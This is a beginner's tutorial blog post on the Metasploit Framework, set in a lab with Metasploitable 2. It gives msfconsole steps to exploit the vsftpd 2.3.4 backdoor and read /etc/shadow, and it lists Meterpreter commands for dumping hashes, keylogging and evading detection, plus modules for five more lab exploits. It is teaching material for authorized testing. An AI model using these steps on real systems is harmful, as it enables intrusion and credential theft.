Penetration Testing Tools20 min read0 views

Metasploit Framework: Complete Beginner Guide for Ethical Hackers

Learn to use Metasploit Framework from scratch — we cover installation, the module system, your first exploit against a practice target, payload selection, and the 10 most common beginner mistakes. This hands-on guide uses Metasploitable 2 as a safe practice environment.

Ugbeda Preacher

Ugbeda Preacher

Security Tools Reviewer · June 22, 2026

Metasploit Framework: Complete Beginner Guide for Ethical Hackers

Key Takeaways

  • Metasploit is the world's most used penetration testing framework — it contains 4,000+ exploits, 800+ auxiliary modules, and 600+ payloads ready to use
  • Start with msfconsole (the command-line interface) rather than the GUI — 95% of professional pen testers use the CLI because it is faster and more flexible
  • Practice only against authorized targets like Metasploitable 2 (a deliberately vulnerable VM) — using Metasploit against systems you do not own is a federal crime
  • The core workflow is always the same: search for a module → configure options (RHOSTS, LHOST, LPORT) → set a payload → run the exploit → interact with the session
  • Meterpreter is the most powerful payload — it gives you a full interactive shell with file browsing, screenshot capture, keylogging, and privilege escalation built in

Metasploit Framework is the most widely used penetration testing tool in the world. Security professionals, ethical hackers, and even government agencies rely on it to test whether systems can be broken into. With over 4,000 exploits and 600 payloads, it turns months of manual exploitation work into a few terminal commands.

But Metasploit can feel intimidating when you first open it. Thousands of modules, confusing terminology, and no obvious starting point. This guide takes you from zero to your first successful exploit — step by step, using a safe practice environment where nothing can go wrong.

What Exactly Is Metasploit?

Think of Metasploit as a toolbox for testing security. Just like a mechanic has wrenches, sockets, and screwdrivers organized by size, Metasploit organizes hacking tools by type:

Module TypeWhat It DoesCount (2026)Analogy
ExploitsTakes advantage of a specific vulnerability to gain access4,100+The key that opens a locked door
PayloadsWhat gets delivered after the exploit works (shells, agents, etc.)600+What you do once you are inside
AuxiliaryScanning, fingerprinting, fuzzing — not exploits, but helpers800+Tools that help you find the right door
PostActions after gaining access (grab passwords, escalate privileges)400+Exploring the house after entering
EncodersObfuscate payloads to avoid antivirus detection45+Disguising yourself so alarms do not go off
NopsNo-operation instructions used in buffer overflow padding10+Spacers that make the key fit perfectly

Setting Up Your Practice Environment

You need two things: Metasploit (the attacker) and a vulnerable target (the practice dummy). Here is how to set them up safely:

What You Need

  • Kali Linux VM — Metasploit comes pre-installed. Follow our Kali Linux setup guide if you need help.
  • Metasploitable 2 VM — A deliberately vulnerable Linux VM made by the Metasploit team. Download it from SourceForge and import it into VirtualBox.
  • VirtualBox network setup — Put both VMs on the same "Internal Network" so they can see each other but are isolated from your real network.

Network Configuration

  1. In VirtualBox, go to each VM's settings → Network → Adapter 1
  2. Set "Attached to" = Internal Network for both VMs
  3. Name the network "pentest-lab" for both
  4. Start both VMs. In Kali, run ip addr to find your IP (usually 10.0.2.x). In Metasploitable, the IP shows on the login screen.
  5. Test connectivity: from Kali, run ping [metasploitable-IP]

Important: If you also need internet access on Kali (for updates), add a second network adapter set to NAT. Your first adapter stays on the internal network for lab testing.

Launching Metasploit for the First Time

Open a terminal in Kali and type msfconsole. You will see an ASCII art banner and the msf6 prompt. Here are the essential commands to learn first:

CommandWhat It DoesExample
searchFind modules by name, CVE, or platformsearch type:exploit platform:linux vsftpd
useSelect a module to configureuse exploit/unix/ftp/vsftpd_234_backdoor
infoShow details about the selected moduleinfo
show optionsDisplay required and optional settingsshow options
setConfigure a module optionset RHOSTS 10.0.2.5
run / exploitExecute the modulerun (or exploit)
sessionsList active connections to targetssessions -l
backExit the current moduleback
db_nmapRun Nmap and save results to Metasploit's databasedb_nmap -sV 10.0.2.5
hosts / servicesView scan results stored in the databaseservices -p 21

Your First Exploit: Step-by-Step Walkthrough

We are going to exploit a known vulnerability in vsftpd 2.3.4 (an FTP server) on Metasploitable 2. This is one of the easiest exploits and a perfect starting point.

Step 1: Scan the Target

In msfconsole, run:

db_nmap -sV 10.0.2.5

This scans the target and stores results in Metasploit's database. You will see port 21 running vsftpd 2.3.4. This version has a famous backdoor — someone inserted malicious code into the source before it was released in 2011.

Step 2: Find the Exploit

search vsftpd

Metasploit finds: exploit/unix/ftp/vsftpd_234_backdoor. The "excellent" ranking means it works reliably.

Step 3: Select and Configure

use exploit/unix/ftp/vsftpd_234_backdoor

show options

You will see RHOSTS is required (the target IP). Set it:

set RHOSTS 10.0.2.5

Step 4: Run the Exploit

run

If successful, you get a command shell on the target. Type whoami — you should see "root". You now have full control of the target system. Type id to see your user info, and cat /etc/shadow to view password hashes (proving you have root access).

Step 5: Clean Up

Type exit to close the session. In a real engagement, you would document everything — the vulnerability, how you exploited it, and what access it gave you.

Metasploit Exploit Workflow: From Scan to Shell 1 SCAN db_nmap -sV target Find open ports and services 2 SEARCH search vsftpd Find matching exploit modules 3 CONFIGURE use exploit/... set RHOSTS x.x Set target IP and payload 4 EXPLOIT run Execute attack get access 5 INTERACT whoami → root You now own the target Metasploit Module Counts (2026) Exploits: 4,100+ Auxiliary: 800+ Payloads: 600+ Top 5 Beginner-Friendly Exploits for Practice vsftpd 2.3.4 EternalBlue (MS17-010) UnrealIRCd Samba usermap Tomcat Manager
Every Metasploit exploit follows this same 5-step workflow. Once you memorize it, you can use any of the 4,100+ exploit modules.

Understanding Payloads: What Happens After the Exploit

The exploit opens the door. The payload is what walks through it. Choosing the right payload is critical:

Payload TypeWhat It DoesWhen to Use
Meterpreter (reverse_tcp)Full interactive shell — file browse, screenshot, keylog, privilege escalation, network pivotingMost common choice. Works on Windows and Linux. Use this by default.
Shell (reverse_tcp)Basic command shell — like opening a terminal on the targetWhen Meterpreter is detected by antivirus or the target is limited
Shell (bind_tcp)Opens a port on the target for you to connect TOWhen your machine cannot receive incoming connections (rare)
StagedSends a small loader first, then downloads the full payloadWhen network bandwidth or target memory is limited
StagelessSends the entire payload at once in a single packetWhen fewer network connections are better (stealth)

How to tell staged vs stageless: Look at the payload name. A forward slash (/) means staged: windows/meterpreter/reverse_tcp. An underscore (_) means stageless: windows/meterpreter_reverse_tcp. Staged sends less data initially but makes a second connection. Stageless is one big packet but more reliable.

Meterpreter: Your Best Friend After Exploitation

When an exploit succeeds and delivers a Meterpreter payload, you land in the "meterpreter >" prompt. This is one of the most powerful tools in all of cybersecurity. Here are the commands you will use most:

CommandWhat It DoesCategory
sysinfoShows OS version, architecture, hostname, domainRecon
getuidShows your current user (like whoami)Recon
getsystemAttempts automatic privilege escalation to SYSTEM/rootEscalation
hashdumpDumps local user password hashes (requires SYSTEM)Credentials
download / uploadTransfer files to and from the targetFile ops
screenshotTakes a screenshot of the current desktopEvidence
keyscan_start / keyscan_dumpStarts a keylogger and dumps captured keystrokesCredentials
shellDrops into a regular OS command shellAccess
migrateMoves Meterpreter to another process (evades detection)Persistence
portfwdSets up port forwarding through the targetPivoting
run autorouteRoutes traffic through the compromised target to reach other networksPivoting
backgroundPuts the session in the background so you can use msfconsoleManagement

5 More Practice Exploits for Beginners

After vsftpd, try these against Metasploitable 2 to build your skills:

1. Samba usermap_script (Port 139/445)

Use: exploit/multi/samba/usermap_script. Set RHOSTS to your target. This exploits a vulnerability in Samba's username map script. Very reliable, gives you root instantly.

2. UnrealIRCd Backdoor (Port 6667)

Use: exploit/unix/irc/unreal_ircd_3281_backdoor. Like vsftpd, someone inserted a backdoor into the software before release. Another easy root shell.

3. Tomcat Manager Default Credentials (Port 8180)

Use: auxiliary/scanner/http/tomcat_mgr_login first to confirm default credentials (tomcat/tomcat). Then use exploit/multi/http/tomcat_mgr_upload to upload a malicious WAR file and get a shell.

4. Distcc Daemon (Port 3632)

Use: exploit/unix/misc/distcc_exec. Distcc is a distributed compilation tool. The Metasploitable version allows remote code execution. You get a low-privilege shell — use this to practice privilege escalation.

5. PostgreSQL Login (Port 5432)

Use: auxiliary/scanner/postgres/postgres_login to find default credentials. Then use exploit/linux/postgres/postgres_payload to get execution through the database. Good practice for database attacks.

Which Payload Should You Use? Is AV running on target? No Use Meterpreter ★ meterpreter/reverse_tcp Best choice — full features, reliable file ops • screenshots • keylog • pivot Yes Staged or Stageless? Stealth shell/reverse_tcp (staged) Smaller footprint, less detection needs 2 connections • less stable Reliable shell_reverse_tcp One packet, more reliable larger payload • easier to detect For practice labs without AV, always start with Meterpreter reverse_tcp. Switch payload types only when needed.
Your payload choice depends on the target environment. In practice labs, Meterpreter is always the best starting point.

10 Beginner Mistakes to Avoid

  1. Forgetting to set LHOST. Your exploit works but the payload cannot connect back because LHOST is wrong. Always set LHOST to your Kali IP (use ip addr to check).
  2. Using the wrong payload architecture. Sending a 64-bit payload to a 32-bit target fails silently. Check the target with sysinfo or Nmap and match architectures.
  3. Not starting the database. Run sudo msfdb init before launching msfconsole. Without the database, db_nmap and hosts/services commands will not work.
  4. Trying to exploit patched systems. Metasploitable 2 is vulnerable on purpose. Real systems have patches. Do not expect the same easy exploits to work on updated systems.
  5. Ignoring the info command. Before running any exploit, type info. It tells you the vulnerability details, compatible targets, default options, and reliability rating.
  6. Not backgrounding sessions. When you get a shell, type background instead of exiting. This keeps the session alive while you exploit other services on the same target.
  7. Running multiple handlers on the same port. Each reverse shell listener needs a unique LPORT. If you already have a handler on port 4444, set the next one to 4445.
  8. Skipping enumeration. Jumping straight to exploitation without understanding the target leads to wasted time. Always scan thoroughly first with db_nmap and auxiliary modules.
  9. Forgetting to update. Run sudo apt update && sudo apt install metasploit-framework regularly. New exploits are added weekly.
  10. Using Metasploit on unauthorized targets. This cannot be repeated enough. Every command you run against a target without authorization is potentially a criminal offense. Only use practice labs and authorized engagements.

Beyond the Basics: What to Learn Next

Once you can consistently exploit Metasploitable 2 targets and navigate Meterpreter comfortably:

  • Learn post-exploitation modules. Run search type:post to see 400+ post-exploitation modules. These help you escalate privileges, steal credentials, and pivot to other machines.
  • Try HackTheBox machines. They are more realistic than Metasploitable and require combining multiple tools — not just Metasploit.
  • Write custom resource scripts. Save your common commands as .rc files: msfconsole -r my_script.rc automates repetitive workflows.
  • Explore the Metasploit API. Use msfrpcd to control Metasploit programmatically from Python or Ruby scripts for automated testing.
  • Study for OSCP. The Offensive Security Certified Professional exam limits Metasploit use to one machine — forcing you to learn manual exploitation too. It is the gold standard certification for pen testers.

Metasploit is not a magic button that hacks everything automatically. It is a framework that organizes and automates exploitation techniques. The real skill is in understanding why an exploit works, knowing what to do after you gain access, and communicating findings to clients in a way that actually improves their security.

Frequently Asked Questions

The Metasploit Framework (open source) is completely free and comes pre-installed on Kali Linux. Rapid7 also offers Metasploit Pro, which is a commercial product with a GUI, automated features, and team collaboration — it costs several thousand dollars per year and is used by professional security firms. For learning, the free Framework has everything you need.

Ugbeda Preacher

Ugbeda Preacher

Security Tools Reviewer

Pen Testing & Tool Reviews

Ugbeda is a certified ethical hacker (CEH, OSCP) and security tools specialist with five years of hands-on penetration testing experience. He brings a rigorous, no-nonsense approach to testing and reviewing security products, cutting through marketing hype to deliver honest, real-world assessments. His reviews help security teams and IT professionals choose the right tools for their specific environments.

You Might Also Like

Free Newsletter

Stay Ahead of Cyber Threats

Get weekly cybersecurity insights and practical tips. No spam, just actionable advice to keep you safe.